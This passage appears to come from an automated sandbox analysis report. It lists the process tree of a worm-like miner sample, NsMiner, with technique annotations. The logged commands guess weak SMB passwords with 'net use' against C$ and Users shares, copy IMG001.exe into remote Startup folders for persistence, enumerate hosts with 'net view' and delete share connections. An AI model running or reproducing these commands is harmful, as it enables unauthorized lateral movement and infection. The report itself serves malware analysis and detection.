        Indicator Removal: Network Share Connection Removal
        
        PID:6764
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        Runs ping.exe
        
        PID:2372
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1948
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7180
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7612
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5576
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7460
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6844
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4316
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1196
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5652
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3628
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3336
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5124
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:1252
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:1816
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:2368
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6952
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7524
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5388
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8120
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:748
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "
        6⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"
        7⤵
        
        PID:3020
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:5296
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8012
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1908
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"1"
        6⤵
        
        PID:2808
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"1"
        6⤵
        
        PID:5252
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6064
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"1"
        6⤵
        
        PID:1096
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"1"
        6⤵
        
        PID:5288
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8164
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"1"
        6⤵
        
        PID:3452
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"1"
        6⤵
        
        PID:1448
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:792
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"1"
        6⤵
        
        PID:8088
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"1"
        6⤵
        
        PID:7336
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:3044
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"1"
        6⤵
        
        PID:2300
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"1"
        6⤵
        
        PID:3972
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:5272
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"10.127.255.255"
        6⤵
        
        PID:6120
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"10.127.255.255"
        6⤵
        
        PID:6604
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:3028
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"10.127.255.255"
        6⤵
        
        PID:5848
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"10.127.255.255"
        6⤵
        
        PID:232
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:1096
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"10.127.255.255"
        6⤵
        
        PID:6476
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"10.127.255.255"
        6⤵
        
        PID:6440
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2816
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"
        6⤵
        
        PID:8100
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"
        6⤵
        
        PID:5652
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:6724
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"10.127.255.255"
        6⤵
        
        PID:4316
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"10.127.255.255"
        6⤵
        
        PID:1200
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:4888
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"10.127.255.255"
        6⤵
        
        PID:6284
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"10.127.255.255"
        6⤵
        
        PID:8000
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5656
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"administrator"
        6⤵
        
        PID:7112
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"administrator"
        6⤵
        
        PID:6324
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5292
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"administrator"
        6⤵
        
        PID:700
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"administrator"
        6⤵
        
        PID:2236
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7672
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"administrator"
        6⤵
        
        PID:4124
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"administrator"
        6⤵
        
        PID:1740
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:4924
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "administrator" /user:"administrator"
        6⤵
        
        PID:1612
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "administrator" /user:"administrator"
        6⤵
        
        PID:4528
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:336
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"administrator"
        6⤵
        
        PID:7128
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"administrator"
        6⤵
        
        PID:5472
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:5692
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"administrator"
        6⤵
        
        PID:6860
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"administrator"
        6⤵
        
        PID:5228
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:4492
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"user"
        6⤵
        
        PID:6592
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"user"
        6⤵
        
        PID:7016
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6772
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"user"
        6⤵
        
        PID:7760
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"user"
        6⤵
        
        PID:1192
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:5108
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"user"
        6⤵
        
        PID:7680
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"user"
        6⤵
        
        PID:2380
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7444
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "user" /user:"user"
        6⤵
        
        PID:7368
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "user" /user:"user"
        6⤵
        
        PID:6764
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5084
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"user"
        6⤵
        
        PID:6860
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"user"
        6⤵
        
        PID:3308
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7052
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"user"
        6⤵
        
        PID:7840
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"user"
        6⤵
        
        PID:5032
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:568
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"admin"
        6⤵
        
        PID:3908
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"admin"
        6⤵
        
        PID:6208
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7532
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"admin"
        6⤵
        
        PID:7760
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"admin"
        6⤵
        
        PID:1192
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:6736
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"admin"
        6⤵
        
        PID:4932
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"admin"
        6⤵
        
        PID:5600
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:6064
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "admin" /user:"admin"
        6⤵
        
        PID:7284
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "admin" /user:"admin"
        6⤵
        
        PID:2552
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:1252
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"admin"
        6⤵
        
        PID:4460
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"admin"
        6⤵
        
        PID:2100
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7300
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"admin"
        6⤵
        
        PID:7360
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"admin"
        6⤵
        
        PID:1564
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6700
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7616
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7352
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:5544
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:2160
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:1444
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2152
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3204
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7732
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6168
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7944
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6948
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7348
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1703" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7432
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1703" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:1696
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1196
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3848
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "
        6⤵
        
        PID:1148
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.0.1
        7⤵
        Discovers systems in the same network
        
        PID:4868
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:3140
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7940
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:3260
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7740
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5252
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5844
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8032
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1904
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1504
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5648
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2860
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6028
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5220
      - C:\Windows\SysWOW64\cmd.exe
        
